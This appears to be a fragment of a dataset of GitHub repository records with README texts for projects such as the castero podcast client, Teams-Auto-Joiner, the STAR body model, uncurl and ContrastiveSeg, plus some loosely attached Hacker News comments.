Installation\n\n```bash\n$ git clone https://github.com/xgi/castero\n$ cd castero\n$ sudo python setup.py install\n```\n\n## Dependencies\n\nRunning castero requires the following external dependencies:\n\n* Python >= 3.5 (check the output of ``python --version``)\n* sqlite3\n* At least one of the following media players:\n * vlc >= 2.2.3\n * (mpv and libmpv) >= 0.14.0\n \n## Usage\n\nAfter installing castero, it can be run with simply:\n\n```bash\n$ castero\n```\n\nThe help menu provides a list of controls and can be accessed by pressing\nh. 
Alternatively, see the list below:\n\n```text\nCommands\n h - show this help screen\n q - exit the client\n a - add a feed\n d - delete the selected feed\n r - reload/refresh feeds\n s - save episode for offline playback\n UP/DOWN - navigate up/down in menus\n RIGHT/LEFT - navigate right/left in menus\n PPAGE/NPAGE - scroll up/down in menus\n ENTER - play selected feed/episode\n SPACE - add selected feed/episode to queue\n c - clear the queue\n n - go to the next episode in the queue\n i - invert the order of the menu\n / - filter the contents of the menu\n m - mark episode as played/unplayed\n p or k - pause/play the current episode\n f or l - seek forward\n b or j - seek backward\n =/- - increase/decrease volume\n ]/[ - increase/decrease playback speed\n u - show episode URL\n 1-5 - change between client layouts\n```\n\n### Importing/exporting feeds from another client\n\ncastero supports importing and exporting an [OPML file](https://en.wikipedia.org/wiki/OPML)\nof your subscriptions in order to easily transfer them between other podcast\nclients. Please refer to your other client's documentation for details on\nhow/if it supports this format.\n\nImporting and exporting from castero are available with command line flags.\nRun `castero --help` for details.\n\n## Configuration\n\nThe configuration file is located at `{HOME}/.config/castero/castero.conf`\nafter the client has been run at least once.\n\nPlease see the [default castero.conf](https://github.com/xgi/castero/blob/master/castero/templates/castero.conf)\nfor a list of available settings.\n\nUser data, including downloaded episodes and a database with your feed\ninformation, is located at `{HOME}/.local/share/castero/`. These files are not\nintended to be manually modified. Removing the database will simply cause\ncastero to replace it with an empty one the next time you run the client.\n\n## Testing\n\nThis project uses [pytest](https://pytest.org) for testing. To run tests, run\nthe following command in the project's root directory:\n\n```bash\n$ python -m pytest tests\n```\n\nYou can also run tests for an individual unit, i.e.:\n\n```bash\n$ python -m pytest tests/test_feed.py\n```\n\n## License\n\n[MIT License](https://github.com/xgi/castero/blob/master/LICENSE.txt)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "pulp/pulp", "link": "https://github.com/pulp/pulp", "tags": [], "stars": 515, "description": "\u26d4\ufe0fPulp2 is EOL! \u26d4\ufe0fPulp 2 platform code, including the server and base admin and consumer clients", "lang": "Python", "repo_lang": "", "readme": ":warning: \u26d4\ufe0f Pulp2 is EOL as of November 30 2022, for more info visit this link https://pulpproject.org/2022/09/19/pulp-2-eol/. \u26d4\ufe0f\n\nPulp is a platform for managing repositories of content, such as software\npackages, and pushing that content out to large numbers of consumers.\n\nFor more information, check out the project website:\n\nhttp://www.pulpproject.org\n", "readme_type": "text", "hn_comments": "Clickable links: https://terminusdb.com/ https://github.com/GavinMendelGleason/blog/blob/main/entries...The author is pessimistic about Beeper's future. 
They will be happy to learn that the EU will basically force messaging interoperability in the next 2 years:https://techcrunch.com/2022/03/24/dma-political-agreement/Good honest comments as to why such an app is not possible.https://www.theregister.com/2023/02/10/googles_go_programmin...\nhttps://github.com/golang/go/discussions/58409I mean, I wasn\u2019t really surprised here, with this being Google always finding ways to collect data on just about anything to make money.Remember, cooperations don\u2019t give a crap about you at all when it comes to profits and headcount, so it isn\u2019t worth signing up and investing a huge amount of your \u2018dreams\u2019 to \u2018get into a corporation\u2019 all to get exploited and used in the end.Go team, Kubernetes Team or any team or product by a corporation is all motivated by profit and a good image and nothing else.I am sure engineers these days are smart enough to see patterns in data, puzzles or solving problems by creating algorithms, they must be also smart enough not to be na\u00efve to think that companies care about them.You seem way too invested into1. a programming language2. the telemetry proposalI like Go, I would never use the words \"hopes and dreams\" to refer to it (or any other language). And the telemetry proposal isn't as apocalyptic as you're making it out to be either.Why the drama. This seems more like a personal emotional regulation problem than anything else.This situation is morally a bit muddled. For that reason, it is not a \"teachable moment\". I'd let this slide.GPLv3 vs BSDIf it matters hire a lawyer because there's no GNU Enforcement Agency.Not that I don't love GPL philosophically, but copy-left is only as strong as the good-will of others and my willingness to lawyer up against people who violate it.Good luck.1. The person who submitted the pull request is about to cause that other project to violate your copyright, which will cause it significant inconvenience if discovered. Regardless of whether the student making that pull request understands what they're doing, I think it would be good to warn the project.2. If you want the upstream project to benefit from your code, you might consider selectively re-licensing that portion of it under the same licence (or a compatible one). This should include appropriate boilerplate headers and/or SPDX identifiers, if upstream uses them.3. An appropriately phrased warning will benefit the student, who has the opportunity to learn the basics of copyright before they accidentally copy a few thousand lines of code from somebody with a legal department.--edit: I believe I've located the project and PR in question. Given the context in the thread, if you decide that you're OK with code from your implementation being used as-is under the terms of the BSD license then I think a comment to that effect in the PR would be helpful to all involved.NoI'd say don't bother because you can implement this functionality as a separate program.I don't know whether or not it would be rejected, but it seems to me like a reasonable addition. Go for it.3 possibilities:1. It gets accepted. People who don't care about it can ignore it. People who want to take advantage of it will. You get bragging rights, you benefit, and others benefit.2. It gets rejected. Assuming your proposed patch is made public, then it will be of benefit to someone who wants to include it themself in their own build, and it can serve as an educational aid to someone who wants to understand the codebase more. 
You can still point to the PR as evidence of your activity and support for FOSS software. You still benefit, and it may benefit others, depending on their activity.3. You don't submit the PR at all. You benefit from the personal knowledge that you gained, but it is very difficult to demonstrate/prove that to anyone, and any work that you did will not benefit anyone else.In other words, just do it. That's my suggestion. It's your life, and at the end of the year, would you rather have tried and failed, or let someone here talk you out of trying at all? Your only choice is whether or not to try. If you succeed, then that makes it even better. But DO NOT pass up opportunities to try to do things like this.Context: I just had the same opportunity, but with Manim, so I decided to record the process (it's now on YouTube), and I submitted the PR to Manim last night.The GNU core utils mailing list is probably a better place to ask...https://savannah.gnu.org/mail/?group=coreutils", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "TobiasPankner/Teams-Auto-Joiner", "link": "https://github.com/TobiasPankner/Teams-Auto-Joiner", "tags": [], "stars": 515, "description": "Python script to automatically join Microsoft Teams meetings.", "lang": "Python", "repo_lang": "", "readme": "# Teams-Auto-Joiner\n[![GitHub stars](https://img.shields.io/github/stars/TobiasPankner/Teams-Auto-Joiner.svg?style=social&label=Star)](https://GitHub.com/TobiasPankner/Teams-Auto-Joiner/stargazers/)\n[![Donate](https://img.shields.io/badge/Donate-PayPal-green.svg)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=3TU2XDBK2JFU4&source=url)\n\n- [Prerequisites](#prerequisites)\n- [Configuration options](#configuration-options)\n- [Run the script](#run-the-script)\n\nPython script to automatically join Microsoft Teams meetings.\nAutomatically turns off your microphone and camera before joining. Automatic login and blacklist can be set in the config file.\n\nAlways joins the newest meeting and leaves either after a specified time, if you are the last person in the meeting or only if a new one is available (see [Configuration options](#configuration-options) for more information).\nI also made a short tutorial video on how to setup the bot: https://youtu.be/YgkSOqfIjf4\n\n![Demo](https://imgur.com/VQOJl8w.gif)\n\n## Prerequisites \n \n - Python3 ([Download](https://www.python.org/downloads/)) \n \n## Configuration options \n \n- **email/password:** \nThe email/password of your Microsoft account. In case you don't want to store your credentials on disk, you can leave any of them empty and you will be prompted to enter them. If you leave them empty in the prompt too, you will have to enter them in the browser. \n\n- **run_at_time:** \nTime to start the script at. Input is a string of the hour and minute in 24h format, if you want it to start immediately leave this empty. \nIf a time before the current time is given, the next day is used. Also make sure that you entered your email and password.\nFor example, if you want the script to start searching meetings at 6 in the morning on the next day, you would input `06:00` in the config.\n\n- **meeting_mode:**\nChange which meetings should be joined. Modes 1, 2 and 3 are available. 
\n`1` Both channel and calendar meetings \n`2` Only channel meetings \n`3` Only calendar meetings \n\n- **organisation_num:**\nIf your Teams account is in multiple organisations, as seen in the example below, change the organisation_num to the number of the list item (counting starts from 0), \nset to -1 to never change organisation. \n\n \n\n- **random_delay:**\nAdds a random delay (random integer between the two parameters, in seconds) before joining a meeting. Can be useful so the bot seems more \"human like\" or to avoid being one of the first few people to join a meeting. For a fixed delay, set both parameters to the same Integer. \neg: [30,30] will add a fixed delay of 30s before joining the meet.\n\n- **check_interval:**\nThe amount of seconds to wait before checking for meetings again. Only integer numbers greater than 1 are allowed.\n\n- **join_message:**\nA chat message sent when a meeting is joined.\n\n- **auto_leave_after_min:**\nIf set to a value greater than zero, the bot leaves every meeting after the specified time (in minutes). Useful if you know the length of your meeting, if this is left a the default the bot will stay in the meeting until a new one is available.\n\n- **leave_if_last:**\nIf true, leaves the meeting if you are the last person in it.\n\n- **leave_threshold_number:**\nSets the threshold for people to leave the meeting before the bot leaves the meeting. \nFor example: \nPeak members of meeting: 20 \nCurrent members of meeting: 5 \nLeave threshold set to 15 \nBecause 15 people have left the meeting, the bot leaves. \n(Must enable leave_if_last for this to work) \n\n- **leave_threshold_percentage:**\nSets the threshold percentage of people still in the meeting before auto leaving. The same as \nleave_threshold_number but with percentage of the current members to the peak. \n(Must enable leave_if_last for this to work)\n\n- **pause_search:**\nIf true, doesn't search for new meetings while there is one active. Keep in mind to set auto_leave_after_min or leave_if_last,\notherwise the bot will not search for meetings again.\n\n- **headless:**\nIf true, runs Chrome in headless mode (does not open GUI window and runs in background).\n\n- **mute_audio:**\nIf true, mutes all sound output of the browser. This doesn't effect your microphone.\n\n- **chrome_type:**\nValid options: `google-chrome`, `chromium`, `msedge`. By default, google chrome is used, but the script can also be used with Chromium or Microsoft Edge.\n\n- **blacklist:**\nA list of Teams and their channels to ignore. Meetings ocurring in these channels will not be joined.\nIf you have a Team called \"Test1\" and, within that, two channels called \"General\" and \"Channel1\" and you don't want to join meetings in the \"General\" Channel: \n ```json\n \"blacklist\": [\n {\n \"team_name\": \"Test1\",\n \"channel_names\": [\n \"General\"\n ]\n }\n ]\n ```\n If you want to blacklist all the channels in a team, leave the square brackets empty: `\"channel_names\": []`.\n\n- **blacklist_meeting_re:**\nIf calendar meeting title matches a regular expression, it goes to blacklist.\nLeave empty to attend to all calendar meetings. \n\n- **discord_webhook_url:**\nFor getting Discord notifications you have to specify a [Discord webhook url](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks). \n\n ```json \n \"discord_webhook_url\" : \"your_discord_channel_webHook_url\" \n ```\n\n## Run the script\n\n 1. Rename the [config.json.example](config.json.example) file to \"config.json\"\n 2. 
Edit the \"config.json\" file to fit your preferences (optional)\n 3. Install dependencies: ```pip install -r requirements.txt```\n 4. Run [auto_joiner.py](auto_joiner.py): `python auto_joiner.py`\n 5. After starting, teams might be in Grid view, if this is the case change the view to list [(How to do)](https://support.microsoft.com/en-us/office/view-and-organize-your-teams-b9dd0d8c-243a-43a4-9501-ec8017fec32e)\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ahmedosman/STAR", "link": "https://github.com/ahmedosman/STAR", "tags": ["smpl", "smplx", "human", "body", "pose-estimation", "graphics-3d", "eccv2020", "3d-models", "graphics"], "stars": 515, "description": "ECCV2020 - Official code repository for the paper : STAR - A Sparse Trained Articulated Human Body Regressor", "lang": "Python", "repo_lang": "", "readme": "## STAR: Sparse Trained Articulated Human Body Regressor \n\n\n\n\n[[Project Page](https://star.is.tue.mpg.de/)] \n[[Paper](https://ps.is.tuebingen.mpg.de/uploads_file/attachment/attachment/618/star_paper.pdf)]\n[[Supp. Mat.](https://ps.is.tuebingen.mpg.de/uploads_file/attachment/attachment/619/star_supmat.pdf)]\n\n
\n\n\n## Table of Contents\n * [License](#license)\n * [Description](#description)\n * [Content](#content)\n * [Installation and Usage](#Installation)\n * [SMPL Comparison](#SMPLComparison)\n * [Citation](#citation)\n * [Acknowledgments](#acknowledgments)\n * [Contact](#contact)\n\n\n## License\n\nSoftware Copyright License for non-commercial scientific research purposes.\nPlease read carefully the [LICENSE file](https://github.com/ahmedosman/STAR/blob/master/LICENSE) and any accompanying\ndocumentation before you download and/or use the STAR model and\nsoftware, (the \"Data & Software\"). By downloading and/or using the\nData & Software (including downloading, cloning, installing, and any other use\nof the corresponding github repository), you acknowledge that you have read\nthese [terms and conditions](https://github.com/ahmedosman/STAR/blob/master/LICENSE) in the LICENSE file, understand them, and agree to be bound by them. If\nyou do not agree with these [terms and conditions](https://github.com/ahmedosman/STAR/blob/master/LICENSE), you must not download and/or\nuse the Data & Software. Any infringement of the terms of this agreement will\nautomatically terminate your rights under this [License](https://github.com/ahmedosman/STAR/blob/master/LICENSE)\n\n\n## Description\n\nSTAR - A **S**parse **T**rained **A**rticulated Human Body **R**egressor is a generateive 3D human body model, that is designed to be a drop-in replacement for the widely used SMPL model.\nSTAR is trained on a large dataset of 14,000 human subjects, with a learned set of sparse and spatially local pose corrective \nblend shapes. In the Figure below, a single joint movement only influences a sparse set of the model vertices. The mesh vertices in \ngray are not affected by the joint movement. In contrast, for SMPL, bending the left elbow causes a bulge in the right elbow.
\nSTAR is publicly avaiable with the full 300 principal-component shape space for research purposes from our website https://star.is.tue.mpg.de/\n\n
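As a quick orientation for readers who have not worked with the SMPL family before, the corrective-blend-shape construction that STAR follows can be written schematically as below. The notation is the usual SMPL-style convention and is only a sketch; see the paper for the exact definitions STAR uses.

```latex
% Schematic SMPL-family formulation (notation assumed; see the paper for STAR's exact definitions).
% A rest-pose template is corrected by shape- and pose-dependent blend shape offsets,
% then posed with linear blend skinning W(.):
T(\vec{\beta}, \vec{\theta}) = \bar{T} + B_S(\vec{\beta}) + B_P(\vec{\theta})
M(\vec{\beta}, \vec{\theta}) = W\!\big(T(\vec{\beta}, \vec{\theta}),\; J(\vec{\beta}),\; \vec{\theta},\; \mathcal{W}\big)
```

STAR's contribution lies in the pose correctives B_P: they are learned to be sparse and spatially local, so moving one joint only displaces nearby vertices instead of producing the kind of long-range artifact shown in the elbow example above.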
\n\n\n For more details, please see our ECCV paper\n[STAR: Sparse Trained Articulated Human Body Regressor](https://ps.is.mpg.de/uploads_file/attachment/attachment/618/star_paper.pdf).\n\n## Content\nThis repository contains the model loader for the following auto-differention frameworks:\n* PyTorch. \n* Tensorflow 2.0.\n* Chumpy.\n\nCode tested on Python 3.69, CUDA 10.1, CuDNN 7.6.5 and PyTorch 1.6.0, Tensorflow 2.3, Chumpy 0.69 on Ubuntu 18.04\n\n## Installation \n\n### Install \n\nWe recommend doing the following in a python3 virtual environment.\n\n1. Clone the repository: \n\n```Shell\ngit clone git@github.com:ahmedosman/STAR.git\n```\n2. Install your favorite framework
\nChumpy\n```\npip install chumpy==0.69\npip install opencv-python\n```\n\nPyTorch\n```\npip install pytorch==1.6\n```\n\nTensorflow\n```\npip install tensorflow-gpu==2.3\n```\n5. Download the models from our website https://star.is.tue.mpg.de/\n\n6. Update the model paths in the config.py file.\n```python\npath_male_star = '/mypath/male/model.npz'\npath_female_star = '/mypath/female/model.npz'\npath_neutral_star = '/mypath/neutral/model.npz'\n```\n\n7. Install with pip\n```\npip install .\n```\n\n### Usage\n\nUnder demos/* there are scripts demonstrating how to load and use the model in all frameworks. \n```bash\n $PATH_TO_REPO/\n \u251c\u2500\u2500 demos\n \u2502 \u2502\n \u2502 \u251c\u2500\u2500 compare_frameworks.py #Unit test script constructing the model with three frameworks and comparing the output\n \u2502 \u2514\u2500\u2500 load_chumpy.py #A script demonstrating loading the model in chumpy\n \u2502 \u2514\u2500\u2500 load_tf.py #A script demonstrating loading the model in Tensorflow\n \u2502 \u2514\u2500\u2500 load_torch.py #A script demonstrating loading the model in PyTorch\n \u2502 \u2514\u2500\u2500 profile_tf.py #A script profiling the STAR graph as a function of batch Size in Tensorflow\n | \u2514\u2500\u2500 profile_torch.py #A script profiling the STAR graph as a function of batch Size in PyTorch\n```\n\n## SMPL Comparison \nSTAR is designed to be a drop in replacement for SMPL, similar to SMPL it is parameterised with pose and shape parameters, with the same template\nresolution and kinematic tree. \n\n
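As a concrete illustration of that pose/shape parameterisation, a minimal PyTorch sketch of loading and posing the model might look like the following. The module path, class name, constructor arguments, and call signature are assumptions based on the demo scripts mentioned above (e.g. `demos/load_torch.py`); consult those scripts for the actual API.

```python
# Hypothetical sketch based on demos/load_torch.py -- import path, constructor arguments
# and forward signature are assumptions; check the demo script for the real API.
import torch
from star.pytorch.star import STAR  # assumed module layout

model = STAR(gender='neutral', num_betas=10)  # assumed to read path_neutral_star from config.py

batch_size = 1
poses = torch.zeros(batch_size, 72)   # 24 joints x 3 axis-angle parameters, as in SMPL
betas = torch.zeros(batch_size, 10)   # shape coefficients (up to 300 are available)
trans = torch.zeros(batch_size, 3)    # global translation

vertices = model(poses, betas, trans) # posed mesh vertices for each batch element
print(vertices.shape)
```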
\n\n### STAR Kinematic Tree\n
\n\n\n\n\n## Citation\n\nIf you find this Model & Software useful in your research we would kindly ask you to cite:\n\n```bibtex\n author = {Osman, Ahmed A A and Bolkart, Timo and Black, Michael J.},\n title = {{STAR}: A Sparse Trained Articulated Human Body Regressor},\n booktitle = {European Conference on Computer Vision (ECCV)},\n pages = {598--613},\n year = {2020},\n url = {https://star.is.tue.mpg.de}\n} \n```\n\n## Acknowledgments\nWe thank Naureen M. Mahmood, Talha Zaman, Nikos Athanasiou, Joachim Tesch, Muhammed Kocabas, Nikos Kolotouros and Vassilis Choutas for the discussions \nand Sai Kumar Dwivedi, Lea Muller, Amir Ahmad and Nitin Saini for proof reading the script and\nMason Landry for the video voice over and Benjamin Pellkofer for the IT support.\n\n## Contact\n\nFor questions, please contact [star@tue.mpg.de](mailto:star@tue.mpg.de). \n\nFor commercial licensing (and all related questions for business applications), please contact [ps-license@tue.mpg.de](mailto:ps-license@tue.mpg.de).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "spulec/uncurl", "link": "https://github.com/spulec/uncurl", "tags": [], "stars": 515, "description": "A library to convert curl requests to python-requests.", "lang": "Python", "repo_lang": "", "readme": "# Uncurl - Converting curl requests to python-requests\n\n[![Build Status](https://travis-ci.org/spulec/uncurl.png?branch=master)](https://travis-ci.org/spulec/uncurl)\n\n# In a nutshell\n\nUncurl is a library that allows you to convert curl requests into python code that uses [Requests](github.com/kennethreitz/requests). Since the Chrome network inspector has a nifty \"Copy as cURL\", this tool is useful for recreating browser requests in python.\n\nWhen you don't pass any arguments to uncurl, it will use whatever is in your clipboard as the curl command.\n\n\n## Example\n\n```bash\n$ uncurl \"curl 'https://pypi.python.org/pypi/uncurl' -H 'Accept-Encoding: gzip,deflate,sdch' -H 'Accept-Language: en-US,en;q=0.8' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Cache-Control: max-age=0' -H 'Cookie: foo=bar;' -H 'Connection: keep-alive' --compressed\"\nrequests.get(\"https://pypi.python.org/pypi/uncurl\", headers={\n \"Accept-Encoding\": \"gzip,deflate,sdch\",\n \"Accept-Language\": \"en-US,en;q=0.8\",\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Cache-Control\": \"max-age=0\",\n \"Connection\": \"keep-alive\",\n}, cookies={\n \"foo\": \"bar\",\n})\n```\n\nThe underlying API:\n\n```python\nimport uncurl\n\nprint(uncurl.parse(\"curl 'https://pypi.python.org/pypi/uncurl' -H 'Accept-Encoding: gzip,deflate,sdch'\"))\n```\n\nprints the string\n\n```bash\n'requests.get(\"https://pypi.python.org/pypi/uncurl\", headers={\n \"Accept-Encoding\": \"gzip,deflate,sdch\",\n})'\n```\n\nYou can also retrieve the components as python objects:\n\n```python\n>>> import uncurl\n>>> context = uncurl.parse_context(\"curl 'https://pypi.python.org/pypi/uncurl' -H 'Accept-Encoding: gzip,deflate,sdch'\")\n>>> context.url\nhttps://pypi.python.org/pypi/uncurl\n>>> context.headers\nOrderedDict([('Accept-Encoding', 
'gzip,deflate,sdch')])\n```\nOn Mac OS, you can also pipe input to uncurl:\n\n```bash\npbpaste | uncurl\n```\n\n## Install\n\n```console\n$ pip install uncurl\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "confucianzuoyuan/bookstore", "link": "https://github.com/confucianzuoyuan/bookstore", "tags": [], "stars": 515, "description": "\u4f7f\u7528Django\u7f16\u5199\u4e00\u4e2a\u4e66\u57ce\u7535\u5546\u7f51\u7ad9\uff0c\u914d\u5408\u8be6\u7ec6\u7684\u6559\u7a0b\u3002", "lang": "Python", "repo_lang": "", "readme": "#bookstore\nUse Django to write a bookstore e-commerce website, with detailed tutorials.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tfzhou/ContrastiveSeg", "link": "https://github.com/tfzhou/ContrastiveSeg", "tags": ["semantic-segmentation", "contrastive-learning", "pixel-contrast", "hard-example-mining", "cityscapes", "pascal-context"], "stars": 515, "description": "ICCV2021 (Oral) - Exploring Cross-Image Pixel Contrast for Semantic Segmentation", "lang": "Python", "repo_lang": "", "readme": "# Exploring Cross-Image Pixel Contrast for Semantic Segmentation\n\n![](figures/framework.png)\n\n> [**Exploring Cross-Image Pixel Contrast for Semantic Segmentation**](https://arxiv.org/abs/2101.11939), \n> [Wenguan Wang](https://sites.google.com/view/wenguanwang/), [Tianfei Zhou](https://www.tfzhou.com/), [Fisher Yu](https://www.yf.io/), [Jifeng Dai](https://jifengdai.org/), [Ender Konukoglu](https://scholar.google.com/citations?user=OeEMrhQAAAAJ&hl=en) and [Luc Van Gool](https://scholar.google.com/citations?user=TwMib_QAAAAJ&hl=en)
\n> *ICCV 2021 (Oral) ([arXiv 2101.11939](https://arxiv.org/abs/2101.11939))*\n\n## News\n\n* [2022-10-13] Our work [GMMSeg: Gaussian Mixture based Generative Semantic Segmentation Models](https://github.com/leonnnop/GMMSeg) has been accepted to NeurIPS'22.\n* [2022-03-20] Our work [Rethinking Semantic Segmentation: A Prototype View](https://github.com/tfzhou/ProtoSeg) has been accepted to CVPR'22 as an **Oral paper**. \n* [2021-07-28] ContrastiveSeg has been accepted in ICCV'21 as Oral.\n* [2021-07-28] Update memory code.\n* [2021-07-01] The codebase has been transferred from Pytorch-0.4.1 to Pytorch-1.7.1, which will be easier for usage.\n\n## Abstract\n\nCurrent semantic segmentation methods focus only on\nmining \u201clocal\u201d context, i.e., dependencies between pixels\nwithin individual images, by context-aggregation modules\n(e.g., dilated convolution, neural attention) or structureaware optimization criteria (e.g., IoU-like loss). However, they ignore \u201cglobal\u201d context of the training data, i.e.,\nrich semantic relations between pixels across different images. Inspired by the recent advance in unsupervised contrastive representation learning, we propose a pixel-wise\ncontrastive framework for semantic segmentation in the\nfully supervised setting. The core idea is to enforce pixel\nembeddings belonging to a same semantic class to be more\nsimilar than embeddings from different classes. It raises a\npixel-wise metric learning paradigm for semantic segmentation, by explicitly exploring the structures of labeled pixels, which are long ignored in the field. Our method can be\neffortlessly incorporated into existing segmentation frameworks without extra overhead during testing.\n\nWe experimentally show that, with famous segmentation models (i.e.,\nDeepLabV3, HRNet, OCR) and backbones (i.e., ResNet, HRNet), our method brings consistent performance improvements across diverse datasets (i.e., Cityscapes, PASCALContext, COCO-Stuff).\n\n## Installation\n\nThis implementation is built on [openseg.pytorch](https://github.com/openseg-group/openseg.pytorch). 
Many thanks to the authors for the efforts.\n\nPlease follow the [Getting Started](https://github.com/openseg-group/openseg.pytorch/blob/master/GETTING_STARTED.md) for installation and dataset preparation.\n\n## Performance\n\n### Cityscapes Dataset\n\n| Backbone | Model | Train Set | Val Set | Iterations | Batch Size | Contrast Loss | Memory | mIoU | Log | CKPT |Script |\n| --------- | ---------- | --------- | ------- | ---------- | ---------- | ------------- | ------ | ----- | --- | ---- | ---- |\n| ResNet-101| DeepLab-V3 |train | val | 40000 | 8 | N | N | 72.75 | [log](https://github.com/tfzhou/pretrained_weights/releases/download/v0.1/deeplab_v3_deepbase_resnet101_dilated8_deeplab_v3.log) | [ckpt](https://github.com/tfzhou/pretrained_weights/releases/download/v0.1/deeplab_v3_deepbase_resnet101_dilated8_deeplab_v3_max_performance.pth) |```scripts/cityscapes/deeplab/run_r_101_d_8_deeplabv3_train.sh```|\n| ResNet-101| DeepLab-V3 |train | val | 40000 | 8 | Y | N | 77.67 | [log](https://github.com/tfzhou/pretrained_weights/releases/download/v0.1/deeplab_v3_contrast_deepbase_resnet101_dilated8_deeplab_v3_contrast.log) | [ckpt](https://github.com/tfzhou/pretrained_weights/releases/download/v0.1/deeplab_v3_contrast_deepbase_resnet101_dilated8_deeplab_v3_contrast_max_performance.pth) |```scripts/cityscapes/deeplab/run_r_101_d_8_deeplabv3_contrast_train.sh```|\n| HRNet-W48 | HRNet-W48 |train | val | 40000 | 8 | N | N | 79.27 | [log](https://github.com/tfzhou/pretrained_weights/releases/download/v0.1/hrnet_w48_lr1x_hrnet_ce.log) | [ckpt](https://github.com/tfzhou/pretrained_weights/releases/download/v0.1/hrnet_w48_lr1x_hrnet_ce_max_performance.pth) |```scripts/cityscapes/hrnet/run_h_48_d_4.sh```|\n| HRNet-W48 | HRNet-W48 |train | val | 40000 | 8 | Y | N | 80.18 | [log](https://github.com/tfzhou/pretrained_weights/releases/download/v0.1/hrnet_w48_contrast_lr1x_hrnet_contrast_t0.1.log) | [ckpt](https://github.com/tfzhou/pretrained_weights/releases/download/v0.1/hrnet_w48_contrast_lr1x_hrnet_contrast_t0.1_max_performance.pth) |```scripts/cityscapes/hrnet/run_h_48_d_4_contrast.sh```|\n\n_It seems that the DeepLab-V3 baseline does not produce the expected performance on the new codebase. I will tune this later._\n\n\n### Study of the temperature\n| Backbone | Train Set | Val Set | Iterations | Batch Size | Temperature | mIoU |\n| --------- | --------- | ------- | ---------- | ---------- | ------------- | ----- |\n| HRNet-W48 | train | val | 40000 | 8 | 0.05 | 79.80 |\n| HRNet-W48 | train | val | 40000 | 8 | 0.07 | 79.59 |\n| HRNet-W48 | train | val | 40000 | 8 | 0.10 | **80.18** |\n| HRNet-W48 | train | val | 40000 | 8 | 0.20 | 80.01 |\n| HRNet-W48 | train | val | 40000 | 8 | 0.30 | 79.27 |\n| HRNet-W48 | train | val | 40000 | 8 | 0.40 | 79.40 |\n\n\n## t-SNE Visualization\n\n* Pixel-wise Cross-Entropy Loss\n
\n\n* Pixel-wise Contrastive Learning Objective \n \n
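The separation in these embeddings comes from the pixel-wise contrastive objective described in the abstract: embeddings of pixels with the same semantic label are pulled together and pushed away from embeddings of other classes, across images. Below is a minimal PyTorch sketch of such a supervised, InfoNCE-style pixel contrast loss. It illustrates the idea only and is not this repository's implementation, which additionally samples anchors, mines hard examples, and maintains a pixel memory bank.

```python
# Illustrative pixel-wise supervised contrastive loss (InfoNCE style).
# A simplified sketch of the idea, not the code used in this repository.
import torch
import torch.nn.functional as F

def pixel_contrast_loss(embeddings, labels, temperature=0.1):
    """embeddings: (N, D) pixel embeddings sampled from one or more images.
    labels: (N,) semantic class id of each sampled pixel."""
    embeddings = F.normalize(embeddings, dim=1)
    sim = embeddings @ embeddings.t() / temperature             # (N, N) scaled cosine similarity
    self_mask = torch.eye(len(labels), dtype=torch.bool, device=sim.device)
    pos_mask = (labels[:, None] == labels[None, :]) & ~self_mask

    # softmax over all other pixels, then average log-probability of the positives
    logits = sim.masked_fill(self_mask, float('-inf'))
    log_prob = logits - torch.logsumexp(logits, dim=1, keepdim=True)
    pos_log_prob = log_prob.masked_fill(~pos_mask, 0.0).sum(dim=1)
    loss = -pos_log_prob / pos_mask.sum(dim=1).clamp(min=1)
    return loss[pos_mask.any(dim=1)].mean()                     # skip anchors with no positive
```

In the paper this term is combined with the ordinary pixel-wise cross-entropy loss during training and is not needed at test time, which is why the abstract notes that the method adds no extra overhead during testing.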
\n\n## Citation\n```\n@inproceedings{Wang_2021_ICCV,\n author = {Wang, Wenguan and Zhou, Tianfei and Yu, Fisher and Dai, Jifeng and Konukoglu, Ender and Van Gool, Luc},\n title = {Exploring Cross-Image Pixel Contrast for Semantic Segmentation},\n booktitle = {Proceedings of the IEEE/CVF International Conference on Computer Vision (ICCV)},\n year = {2021},\n pages = {7303-7313}\n}\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "SensorsIot/SuperPower", "link": "https://github.com/SensorsIot/SuperPower", "tags": [], "stars": 515, "description": "Here you should find the best power supplies for your low-power projects", "lang": "Python", "repo_lang": "", "readme": "# SuperPower\nHere you should find the best power supplies for your low-power projects. Because of different requirements for an Raspberry Pi and micro-controllers like the ESP32 we split the project into two boards, one for the Raspberry Pi (SuperPower-Rpi) and one for micro-controllers (SuperPower-uC) with low power.\n\n##### [SuperPower-Rpi](/SuperPower-RPi/) for Raspberry Pi\n\n##### [SuperPower-uC](/SuperPower-uC/) for micro-controllers and low-power devices\n\n## Licence\n\nAll hardware designs and products you can find in this repository is licensed under [CERN Open Hardware Licence Version 2 - Weakly Reciprocal](/LICENCE.txt)\n\n## Relevant links\n\n[Discord Channel](https://discord.gg/dCr86Hk) \n\n[Google Drive Project Files](https://drive.google.com/drive/folders/1lCirijHUkISdUYBIRblkILHM6fstifWS)\n\n[![Video](http://img.youtube.com/vi/-SJbdPvgQnE/0.jpg)](https://www.youtube.com/watch?v=-SJbdPvgQnE \"Video\")\n\n[GitHub 